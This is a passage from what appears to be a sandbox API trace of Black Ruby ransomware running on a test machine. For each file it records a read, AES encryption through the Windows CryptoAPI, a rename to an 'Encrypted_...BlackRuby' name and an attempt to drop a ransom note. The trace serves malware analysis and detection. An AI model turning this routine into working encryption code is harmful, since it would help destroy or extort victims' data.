lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif", lpFilePart=0x0) returned 0x31 [0056.585] GetLastError () returned 0x5 [0056.585] SetErrorMode (uMode=0x1) returned 0x0 [0056.585] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\svwk7thi.gif"), fInfoLevelId=0x0, lpFileInformation=0x1b7eab4 | out: lpFileInformation=0x1b7eab4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51b8a4b0, ftCreationTime.dwHighDateTime=0x1d34e28, ftLastAccessTime.dwLowDateTime=0x7d9f30e0, ftLastAccessTime.dwHighDateTime=0x1d34ae4, ftLastWriteTime.dwLowDateTime=0x7d9f30e0, ftLastWriteTime.dwHighDateTime=0x1d34ae4, nFileSizeHigh=0x0, nFileSizeLow=0x53cf)) returned 1 [0056.585] GetLastError () returned 0x5 [0056.585] SetErrorMode (uMode=0x0) returned 0x1 [0056.585] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif", lpFilePart=0x0) returned 0x31 [0056.585] GetLastError () returned 0x5 [0056.586] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif", lpFilePart=0x0) returned 0x31 [0056.586] GetLastError () returned 0x5 [0056.586] SetErrorMode (uMode=0x1) returned 0x0 [0056.586] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\svwk7thi.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.586] GetLastError () returned 0x0 [0056.586] GetFileType (hFile=0x184) returned 0x1 [0056.586] SetErrorMode (uMode=0x0) returned 0x1 [0056.586] GetFileType (hFile=0x184) returned 0x1 [0056.586] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x53cf [0056.586] GetLastError () returned 0x0 [0056.586] ReadFile (in: hFile=0x184, lpBuffer=0x1b80944, nNumberOfBytesToRead=0x53cf, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1b80944*, lpNumberOfBytesRead=0x18ed18*=0x53cf, lpOverlapped=0x0) returned 1 [0056.587] GetLastError () returned 0x0 [0056.587] CloseHandle (hObject=0x184) returned 1 [0056.587] GetLastError () returned 0x0 [0056.587] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif", lpFilePart=0x0) returned 0x31 [0056.587] GetLastError () returned 0x0 [0056.587] SetErrorMode (uMode=0x1) returned 0x0 [0056.587] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\svwk7thi.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51b8a4b0, ftCreationTime.dwHighDateTime=0x1d34e28, ftLastAccessTime.dwLowDateTime=0x7d9f30e0, ftLastAccessTime.dwHighDateTime=0x1d34ae4, ftLastWriteTime.dwLowDateTime=0x7d9f30e0, ftLastWriteTime.dwHighDateTime=0x1d34ae4, nFileSizeHigh=0x0, nFileSizeLow=0x53cf)) returned 1 [0056.587] GetLastError () returned 0x0 [0056.587] SetErrorMode (uMode=0x0) returned 0x1 [0056.587] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c708) returned 1 [0056.587] GetLastError () returned 0x0 [0056.621] CryptImportKey (in: hProv=0x37c708, pbData=0x1be5490, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360f20) returned 1 [0056.621] GetLastError () returned 0x0 [0056.621] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.621] GetLastError () returned 0x0 [0056.626] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.626] GetLastError () returned 0x0 [0056.626] CryptDuplicateKey (in: hKey=0x360f20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x3609e0) returned 1 [0056.626] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.626] GetLastError () returned 0x0 [0056.626] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1c124dc*=0x1, dwFlags=0x0) returned 1 [0056.626] GetLastError () returned 0x0 [0056.626] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1c124a8, dwFlags=0x0) returned 1 [0056.626] GetLastError () returned 0x0 [0056.626] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c12524*, pdwDataLen=0x18ed08*=0x54c0, dwBufLen=0x54c0 | out: pbData=0x1c12524*, pdwDataLen=0x18ed08*=0x54c0) returned 1 [0056.626] GetLastError () returned 0x0 [0056.626] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c1ced0*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c1ced0*, pdwDataLen=0x18ed20*=0x10) returned 1 [0056.626] GetLastError () returned 0x0 [0056.626] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c1cf00*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c1cf00*, pdwDataLen=0x18ed28*=0x10) returned 1 [0056.626] GetLastError () returned 0x0 [0056.626] CryptDestroyKey (hKey=0x360f20) returned 1 [0056.626] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.627] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0056.627] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif", lpFilePart=0x0) returned 0x31 [0056.627] GetLastError () returned 0x0 [0056.627] SetErrorMode (uMode=0x1) returned 0x0 [0056.627] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\svwk7thi.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.628] GetLastError () returned 0xb7 [0056.628] GetFileType (hFile=0x184) returned 0x1 [0056.628] SetErrorMode (uMode=0x0) returned 0x1 [0056.628] GetFileType (hFile=0x184) returned 0x1 [0056.629] CloseHandle (hObject=0x184) returned 1 [0056.629] GetLastError () returned 0xb7 [0056.629] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif", lpFilePart=0x0) returned 0x31 [0056.629] GetLastError () returned 0xb7 [0056.629] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\Encrypted_E27NhSpac6iTPCEwikIZf8dz95shwFJjLMbjfY1DL.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\Encrypted_E27NhSpac6iTPCEwikIZf8dz95shwFJjLMbjfY1DL.BlackRuby", lpFilePart=0x0) returned 0x62 [0056.629] GetLastError () returned 0xb7 [0056.629] SetErrorMode (uMode=0x1) returned 0x0 [0056.629] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\svwk7thi.gif"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51b8a4b0, ftCreationTime.dwHighDateTime=0x1d34e28, ftLastAccessTime.dwLowDateTime=0x7d9f30e0, ftLastAccessTime.dwHighDateTime=0x1d34ae4, ftLastWriteTime.dwLowDateTime=0x29f18f40, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x54d0)) returned 1 [0056.629] GetLastError () returned 0xb7 [0056.629] SetErrorMode (uMode=0x0) returned 0x1 [0056.629] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\svWk7THi.gif" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\svwk7thi.gif"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\Encrypted_E27NhSpac6iTPCEwikIZf8dz95shwFJjLMbjfY1DL.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\encrypted_e27nhspac6itpcewikizf8dz95shwfjjlmbjfy1dl.blackruby")) returned 1 [0056.629] GetLastError () returned 0xb7 [0056.630] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x3d [0056.630] GetLastError () returned 0xb7 [0056.630] SetErrorMode (uMode=0x1) returned 0x0 [0056.630] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.630] GetLastError () returned 0x5 [0056.631] SetErrorMode (uMode=0x0) returned 0x1 [0056.631] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf", lpFilePart=0x0) returned 0x39 [0056.631] GetLastError () returned 0x5 [0056.631] SetErrorMode (uMode=0x1) returned 0x0 [0056.632] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\xucfn1zae ghzvh6.swf"), fInfoLevelId=0x0, lpFileInformation=0x1c4a060 | out: lpFileInformation=0x1c4a060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x365b69b0, ftCreationTime.dwHighDateTime=0x1d34d96, ftLastAccessTime.dwLowDateTime=0xc0569500, ftLastAccessTime.dwHighDateTime=0x1d3583f, ftLastWriteTime.dwLowDateTime=0xc0569500, ftLastWriteTime.dwHighDateTime=0x1d3583f, nFileSizeHigh=0x0, nFileSizeLow=0x13c88)) returned 1 [0056.632] GetLastError () returned 0x5 [0056.632] SetErrorMode (uMode=0x0) returned 0x1 [0056.632] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf", lpFilePart=0x0) returned 0x39 [0056.632] GetLastError () returned 0x5 [0056.632] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf", lpFilePart=0x0) returned 0x39 [0056.632] GetLastError () returned 0x5 [0056.632] SetErrorMode (uMode=0x1) returned 0x0 [0056.632] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\xucfn1zae ghzvh6.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.632] GetLastError () returned 0x0 [0056.632] GetFileType (hFile=0x184) returned 0x1 [0056.632] SetErrorMode (uMode=0x0) returned 0x1 [0056.632] GetFileType (hFile=0x184) returned 0x1 [0056.632] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x13c88 [0056.632] GetLastError () returned 0x0 [0056.632] ReadFile (in: hFile=0x184, lpBuffer=0x1c4bb6c, nNumberOfBytesToRead=0x13c88, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1c4bb6c*, lpNumberOfBytesRead=0x18ed18*=0x13c88, lpOverlapped=0x0) returned 1 [0056.633] GetLastError () returned 0x0 [0056.633] CloseHandle (hObject=0x184) returned 1 [0056.633] GetLastError () returned 0x0 [0056.633] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf", lpFilePart=0x0) returned 0x39 [0056.633] GetLastError () returned 0x0 [0056.633] SetErrorMode (uMode=0x1) returned 0x0 [0056.633] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\xucfn1zae ghzvh6.swf"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x365b69b0, ftCreationTime.dwHighDateTime=0x1d34d96, ftLastAccessTime.dwLowDateTime=0xc0569500, ftLastAccessTime.dwHighDateTime=0x1d3583f, ftLastWriteTime.dwLowDateTime=0xc0569500, ftLastWriteTime.dwHighDateTime=0x1d3583f, nFileSizeHigh=0x0, nFileSizeLow=0x13c88)) returned 1 [0056.633] GetLastError () returned 0x0 [0056.633] SetErrorMode (uMode=0x0) returned 0x1 [0056.634] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c680) returned 1 [0056.634] GetLastError () returned 0x0 [0056.666] CryptImportKey (in: hProv=0x37c680, pbData=0x1ccd850, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ee0) returned 1 [0056.666] GetLastError () returned 0x0 [0056.666] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.666] GetLastError () returned 0x0 [0056.671] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.671] GetLastError () returned 0x0 [0056.671] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360fa0) returned 1 [0056.671] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0056.671] GetLastError () returned 0x0 [0056.671] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x4, pbData=0x1cfa89c*=0x1, dwFlags=0x0) returned 1 [0056.671] GetLastError () returned 0x0 [0056.671] CryptSetKeyParam (hKey=0x360fa0, dwParam=0x1, pbData=0x1cfa868, dwFlags=0x0) returned 1 [0056.671] GetLastError () returned 0x0 [0056.671] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cfa8e4*, pdwDataLen=0x18ed08*=0x13d80, dwBufLen=0x13d80 | out: pbData=0x1cfa8e4*, pdwDataLen=0x18ed08*=0x13d80) returned 1 [0056.672] GetLastError () returned 0x0 [0056.672] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d22410*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1d22410*, pdwDataLen=0x18ed20*=0x10) returned 1 [0056.672] GetLastError () returned 0x0 [0056.672] CryptEncrypt (in: hKey=0x360fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d22440*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1d22440*, pdwDataLen=0x18ed28*=0x10) returned 1 [0056.672] GetLastError () returned 0x0 [0056.674] CryptDestroyKey (hKey=0x360ee0) returned 1 [0056.674] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.674] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0056.674] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf", lpFilePart=0x0) returned 0x39 [0056.674] GetLastError () returned 0x0 [0056.674] SetErrorMode (uMode=0x1) returned 0x0 [0056.674] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\xucfn1zae ghzvh6.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0056.675] GetLastError () returned 0xb7 [0056.675] GetFileType (hFile=0x184) returned 0x1 [0056.675] SetErrorMode (uMode=0x0) returned 0x1 [0056.675] GetFileType (hFile=0x184) returned 0x1 [0056.677] CloseHandle (hObject=0x184) returned 1 [0056.677] GetLastError () returned 0xb7 [0056.677] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf", lpFilePart=0x0) returned 0x39 [0056.677] GetLastError () returned 0xb7 [0056.677] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\Encrypted_2s9blWPPwiPmr7ahr2UoC44bMU1gnagdWmdf.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\Encrypted_2s9blWPPwiPmr7ahr2UoC44bMU1gnagdWmdf.BlackRuby", lpFilePart=0x0) returned 0x5d [0056.677] GetLastError () returned 0xb7 [0056.677] SetErrorMode (uMode=0x1) returned 0x0 [0056.677] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\xucfn1zae ghzvh6.swf"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x365b69b0, ftCreationTime.dwHighDateTime=0x1d34d96, ftLastAccessTime.dwLowDateTime=0xc0569500, ftLastAccessTime.dwHighDateTime=0x1d3583f, ftLastWriteTime.dwLowDateTime=0x29f8b360, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x13d90)) returned 1 [0056.677] GetLastError () returned 0xb7 [0056.677] SetErrorMode (uMode=0x0) returned 0x1 [0056.677] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\xUcFn1ZaE GhZVh6.swf" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\xucfn1zae ghzvh6.swf"), lpNewFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\Encrypted_2s9blWPPwiPmr7ahr2UoC44bMU1gnagdWmdf.BlackRuby" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\encrypted_2s9blwppwipmr7ahr2uoc44bmu1gnagdwmdf.blackruby")) returned 1 [0056.678] GetLastError () returned 0xb7 [0056.681] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x3d [0056.681] GetLastError () returned 0xb7 [0056.681] SetErrorMode (uMode=0x1) returned 0x0 [0056.681] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0056.681] GetLastError () returned 0x5 [0056.682] SetErrorMode (uMode=0x0) returned 0x1 [0056.682] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS", nBufferLength=0x105, lpBuffer=0x18e928, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS", lpFilePart=0x0) returned 0x28 [0056.682] GetLastError () returned 0x5 [0056.682] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0056.682] GetLastError () returned 0x5 [0056.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e84c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0056.682] GetLastError () returned 0x5 [0056.682] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS", lpFilePart=0x0) returned 0x28 [0056.682] GetLastError () returned 0x5 [0056.682] SetErrorMode (uMode=0x1) returned 0x0 [0056.682] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360aa0 [0056.683] GetLastError () returned 0x5 [0056.683] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.683] GetLastError () returned 0x5 [0056.683] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.683] GetLastError () returned 0x5 [0056.683] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.683] GetLastError () returned 0x5 [0056.683] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.683] GetLastError () returned 0x5 [0056.683] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.683] GetLastError () returned 0x5 [0056.683] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0056.683] GetLastError () returned 0x12 [0056.684] FindClose (in: hFindFile=0x360aa0 | out: hFindFile=0x360aa0) returned 1 [0056.684] SetErrorMode (uMode=0x0) returned 0x1 [0056.684] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS", nBufferLength=0x105, lpBuffer=0x18e800, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS", lpFilePart=0x0) returned 0x28 [0056.684] GetLastError () returned 0x12 [0056.684] SetErrorMode (uMode=0x1) returned 0x0 [0056.684] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360aa0 [0056.684] GetLastError () returned 0x12 [0056.684] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.684] GetLastError () returned 0x12 [0056.684] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.684] GetLastError () returned 0x12 [0056.684] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.684] GetLastError () returned 0x12 [0056.684] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.684] GetLastError () returned 0x12 [0056.685] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0056.685] GetLastError () returned 0x12 [0056.685] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0056.685] GetLastError () returned 0x12 [0056.685] FindClose (in: hFindFile=0x360aa0 | out: hFindFile=0x360aa0) returned 1 [0056.685] SetErrorMode (uMode=0x0) returned 0x1 [0056.685] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx", lpFilePart=0x0) returned 0x36 [0056.685] GetLastError () returned 0x12 [0056.685] SetErrorMode (uMode=0x1) returned 0x0 [0056.685] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\m8QLjAhc8xv\\LxS\\J4xhonY_.docx" (normalized: "c:\\users\\eebsym5\\desktop\\m8qljahc8xv\\lxs\\j4xhony_.docx"), fInfoLevelId=0x0, lpFileInformation=0x1b5791c | out: lpFileInformation=0x1b5791c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40b12c00, ftCreationTime.dwHighDateTime=0x1d35913, ftLastAccessTime.dwLowDateTime=0xb8f5fab0, ftLastAccessTime.dwHighDateTime=0x1d34bad, ftLastWriteTime.dwLowDateTime=0xb8f5fab0, ftLastWriteTime.dwHighDateTime=0x1d34bad, nFileSizeHigh=0x0, 